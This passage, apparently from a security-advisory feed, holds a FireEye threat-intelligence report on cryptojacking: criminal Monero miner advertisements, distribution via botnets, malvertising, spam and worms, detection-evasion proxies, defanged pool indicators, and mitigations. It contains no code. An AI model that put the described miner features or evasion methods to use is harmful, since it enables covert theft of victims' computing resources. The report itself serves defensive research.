cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called \"ring signatures,\" which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.\n\nThe Monero blockchain also uses what's called a \"memory-hard\" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.\n\n#### Underground Advertisements for Miners\n\nBecause most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.\n\n**XMR Mining Utilities** \n \n--- \n \nXMR-STACK \n \nMINERGATE \n \nXMRMINER \n \nCCMINER \n \nXMRIG \n \nCLAYMORE \n \nSGMINER \n \nCAST XMR \n \nLUKMINER \n \nCPUMINER-MULTI \n \nTable 1: Commonly used Monero miner utilities\n\nThe following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.\n\n##### Sample Advertisement #1 (Smart Miner + Builder)\n\nIn early April 2018, actor \"Mon\u00a3y\" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD \u2013 payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero \u2013 that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:\n\n * Unlimited builds\n * Builder GUI (Figure 4)\n * Written in AutoIT (no dependencies)\n * FUD\n * Safer error handling\n * Uses most recent XMRig code\n * Customizable pool/port\n * Packed with UPX\n * Works on all Windows OS (32- and 64-bit)\n * Madness Mode option\n\n \nFigure 3: Monero Madness\n\n \nFigure 4: Monero Madness builder\n\n##### Sample Advertisement #2 (Miner + Telegram Bot Builder)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"kent9876\" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:\n\n * Written in C/C++\n * Build size is small (about 100\u2013150 kB)\n * Hides miner process from popular task managers\n * Can run without Administrator privileges (user-mode)\n * Auto-update ability\n * All data encoded with 256-bit key\n * Access to Telegram bot-builder\n * Lifetime support (24/7) via Telegram\n\n \nFigure 5: Goldig Miner advertisement\n\n##### Sample Advertisement #3 (Miner + Credential Stealer)\n\nIn March 2018, FireEye iSIGHT Intelligence observed actor \"TH3FR3D\" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:\n\n * Written in C# (Version 1.0.1.0)\n * Browser stealer for all major browsers (cookies, saved passwords, auto-fill)\n * Monero miner (uses minergate.com pool by default, but can be configured)\n * Filezilla stealer\n * Desktop file grabber (.txt and more)\n * Can download and execute files\n * Update ability\n * USB spreader functionality\n * PHP web panel\n\n \nFigure 6: Felix HTTP\n\n##### Sample Advertisement #4 (Miner + RAT)\n\nIn January 2018, FireEye iSIGHT Intelligence observed actor \"ups\" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the [CVE-2016-0099](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032>) exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for \u20ac200 EUR, or \u20ac325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:\n\n_Windows Build Specifics_\n\n * Written in C++ (no dependencies)\n * Miner component based on XMRig\n * Easy cryptor and VPS hosting options\n * Web panel (Figure 7)\n * Uses TLS for secured communication\n * Download and execute\n * Auto-update ability\n * Cleanup routine\n * Receive remote commands\n * Perform privilege escalation\n * Features \"game mode\" (mining stops if user plays game)\n * Proxy feature (based on XMRig)\n * Support (for \u20ac20/month)\n * Kills other miners from list\n * Hidden from TaskManager\n * Configurable pool, coin, and wallet (via panel)\n * Can mine the following Cryptonight-based coins:\n * Monero\n * Bytecoin\n * Electroneum\n * DigitalNote\n * Karbowanec\n * Sumokoin\n * Fantomcoin\n * Dinastycoin\n * Dashcoin\n * LeviarCoin\n * BipCoin\n * QuazarCoin\n * Bitcedi\n\n_Linux Build Specifics_\n\n * Issues running on Linux servers (higher performance on desktop OS)\n * Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)\n\n \nFigure 7: Miner bot web panel\n\n##### Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)\n\nIn August 2017, actor \"MeatyBanana\" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:\n\n * Configurable miner pool and port (default to minergate)\n * Compatible with both 64- and 86-bit Windows OS\n * Hides from the following popular task managers:\n * Windows Task Manager\n * Process Killer\n * KillProcess\n * System Explorer\n * Process Explorer\n * AnVir\n * Process Hacker\n * Masked as a system driver\n * Does not require administrator privileges\n * No dependencies\n * Registry persistence mechanism\n * Ability to perform \"tasks\" (download and execute files, navigate to a site, and perform DDoS)\n * USB spreader\n * Support after purchase\n\n#### The Cost of Cryptojacking\n\nThe presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:\n\n 1. Degradation in system performance\n 2. Increased cost in electricity\n 3. Potential exposure of security holes\n\nCryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.\n\nIn the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominately rely on decades-old hardware and low-bandwidth networks, therefore even a slight increase in CPU load or the network could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real-time.\n\nThe electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.\n\nCryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as [TRITON](<https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html>).\n\n#### Cryptocurrency Miner Distribution Techniques\n\nIn order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:\n\n * User endpoint machines\n * Enterprise servers\n * Websites\n * Mobile devices\n * Industrial control systems\n\n##### Cryptojacking in the Cloud\n\nPrivate sector companies and governments alike are increasingly [moving their data and applications to the cloud](<https://www.fireeye.com/blog/executive-perspective/2018/04/anatomy-of-a-public-cloud-compromise.html>), and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.\n\nThe following are some real-world examples of cryptojacking in the cloud:\n\n * In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the [post-exploitation and pre-mining dissemination techniques](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>) used in those campaigns.\n * In March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/coinminer-campaigns-move-to-the-cloud-via-docker-kubernetes/>) on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.\n * In February 2018, [Bleeping Computer also reported](<https://www.bleepingcomputer.com/news/security/tesla-internal-servers-infected-with-cryptocurrency-miner/>) on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.\n * Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the [LA Times online compromise](<https://www.theregister.co.uk/2018/02/22/la_times_amazon_aws_s3/>) in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.\n\n##### Incorporation of Cryptojacking into Existing Botnets\n\nFireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.\n\nThe following are some real-world examples of cryptojacking being incorporated into existing botnets:\n\n * In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.\n * On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's [AuthedMine](<https://authedmine.com/lib/authedmine.min.js>).\n * In late 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/codefork-group-uses-fileless-malware-to-deploy-monero-miners/>) that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.\n * In late 2017, FireEye researchers observed Trickbot operators deploy a new module named \"testWormDLL\" that is a statically compiled copy of the popular XMRig Monero miner.\n * On Aug. 29, 2017, [Security Week reported](<https://www.securityweek.com/jimmy-banking-trojan-reuses-nukebot-code>) on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.\n\n#### Drive-By Cryptojacking\n\n##### In-Browser\n\nFireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.\n\nThe following are some real-world examples of Coinhive being deployed in the wild:\n\n * In September 2017, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/>) that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.\n * During mid-September 2017, [users on Reddit](<https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new>) began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).\n * In December 2017, researchers with [Sucuri reported](<https://blog.sucuri.net/2017/12/malicious-cryptominers-from-github.html>) on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.\n * Other reporting disclosed the Coinhive script being embedded on the [Showtime domain](<https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/>) as well as on the [LA Times website](<https://www.itwire.com/security/81860-la-times-serving-cryptocurrency-mining-script.html>), both surreptitiously mining Monero.\n * A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user\u2019s web browser is open. However, [researchers with Malwarebytes Labs](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>) uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.\n\n \nFigure 8: Statement from TPB operators on Coinhive script\n\n##### Malvertising and Exploit Kits\n\nMalvertisements \u2013 malicious ads on legitimate websites \u2013 commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.\n\nThe following are some real-world examples of this activity:\n\n * In early 2018, [researchers with Trend Micro reported](<https://www.bleepingcomputer.com/news/security/coinhive-cryptojacker-deployed-on-youtube-via-google-ads/>) that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script _coinhive.min.js_, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.\n * In April 2018, researchers with [Trend Micro](<https://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-web-miner-script-injected-into-aol-advertising-platform/>) also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.\n * Since July 16, 2017, [FireEye has observed](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.\n * In January 2018, [Check Point researchers](<https://research.checkpoint.com/new-rig-exploit-kit-campaign-dropping-xmrig-miner/>) discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.\n\n#### Mobile Cryptojacking\n\nIn addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.\n\nThe following are some real-world examples of mobile devices being used for cryptojacking:\n\n * During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:\n * In March 2014, Android malware named \"CoinKrypt\" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.\n * In March 2014, another form of Android malware \u2013 \"Android.Trojan.MuchSad.A\" or \"ANDROIDOS_KAGECOIN.HBT\" \u2013 was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including \"Football Manager Handheld\" and \"TuneIn Radio.\" Variants of this malware have reportedly been downloaded by millions of Google Play users.\n * In April 2014, Android malware named \"BadLepricon,\" which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.\n * In October 2014, a type of mobile malware called \"Android Slave\" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.\n * In December 2017, [researchers with Kaspersky Labs reported](<https://securelist.com/jack-of-all-trades/83470/>) on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.\n * In January 2018, [SophosLabs released a report](<https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-coinminer-and-other-malicious-cryptominers-tpna.pdf?la=en>) detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.\n * Between November 2017 and January 2018, [researchers with Malwarebytes Labs reported](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.\n\n#### Cryptojacking Spam Campaigns\n\nFireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.\n\nIn late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.\n\n \nFigure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner\n\nAdditionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).\n\n**ZIP Filenames** \n \n--- \n \ncalifornia_540_tax_form_2013_instructions.exe\n\nstate_bank_of_india_money_transfer_agency.exe\n\nformat_transfer_sms_banking_bni_ke_bca.exe\n\nconfirmation_receipt_letter_sample.exe\n\nsbi_online_apply_2015_po.exe\n\nestimated_tax_payment_coupon_irs.exe\n\nhow_to_add_a_non_us_bank_account_to_paypal.exe\n\nwestern_union_money_transfer_from_uk_to_bangladesh.exe\n\ncan_i_transfer_money_from_bank_of_ireland_to_aib_online.exe\n\nhow_to_open_a_business_bank_account_with_bad_credit_history.exe\n\napply_for_sbi_credit_card_online.exe\n\nlist_of_lucky_winners_in_dda_housing_scheme_2014.exe \n \nTable 2: Sampling of observed ZIP filenames delivering cryptocurrency miner\n\n#### Cryptojacking Worms\n\nFollowing the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>). Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.\n\nThe following are some real-world examples of cryptojacking worms:\n\n * In May 2017, [Proofpoint reported](<https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar>) a large campaign distributing mining malware \"Adylkuzz.\" This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.\n * Security researchers with [Sensors identified](<https://sensorstechforum.com/w32-rarogminer-monero-miner-worm-lsass-exe-remove/>) a Monero miner worm, dubbed \"Rarogminer,\" in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.\n * In January 2018, [researchers at F5](<https://f5.com/labs/articles/threat-intelligence/malware/new-python-based-crypto-miner-botnet-flying-under-the-radar>) discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.\n\n#### Detection Avoidance Methods\n\nAnother trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.\n\nIn March 2018, [Bleeping Computer reported](<https://www.bleepingcomputer.com/news/security/in-browser-cryptojacking-is-getting-harder-to-detect/>) on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.\n\nSeveral mining proxy tools can be found on GitHub, such as the [XMRig Proxy](<https://github.com/xmrig/xmrig-proxy>) tool, which greatly reduces the number of active pool connections, and the [CoinHive Stratum Mining Proxy](<https://github.com/x25/coinhive-stratum-mining-proxy>), which uses Coinhive\u2019s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.\n\nIn addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to [Sucuri researchers](<https://blog.sucuri.net/2018/01/malicious-cryptominers-from-github-part-2.html>), cloud-based servers provide many benefits to actors looking to host their own mining applications, including:\n\n * Available free or at low-cost\n * No maintenance, just upload the crypto-miner app\n * Harder to block as blacklisting the host address could potentially impact access to legitimate services\n * Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts\n\nThe combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.\n\n#### Mining Victim Demographics\n\nBased on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with [other reporting](<https://www.bleepingcomputer.com/news/cryptocurrency/students-mining-cryptocurrencies-are-clogging-up-university-networks/>), the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).\n\n \nFigure 10: Cryptocurrency miner detection activity per month\n\n \nFigure 11: Commonly observed pools and associated ports\n\n \nFigure 12: Top 10 affected countries\n\n \nFigure 13: Top five affected industries\n\n \nFigure 14: Top affected industries by country\n\n#### Mitigation Techniques\n\n##### Unencrypted Stratum Sessions\n\nAccording to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.\n\n \nFigure 15: Stratum subscription request parameters\n\n##### Encrypted Stratum Sessions\n\nIn the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.\n\n##### Browser-Based Sessions\n\nIdentifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.\n\nAs defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:\n\n * Blocking domains known to have hosted coin mining scripts\n * Blocking websites of known mining project websites, such as Coinhive\n * Blocking scripts altogether\n * Using an ad-blocker or coin mining-specific browser add-ons\n * Detecting commonly used naming conventions\n * Alerting and blocking traffic destined for known popular mining pools\n\nSome of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.\n\nIt is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.\n\n#### Outlook\n\nIn underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.\n\nDue to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.\n\nBecause of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-18T10:00:00", "type": "fireeye", "title": "How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0099", "CVE-2017-10271"], "modified": "2018-07-18T10:00:00", "id": "FIREEYE:2473273CA0F291BCEBB5F99AA3E4F256", "href": "https://www.fireeye.com/blog/threat-research/2018/07/cryptocurrencies-cyber-crime-growth-of-miners.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:24:47", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. The idea that these 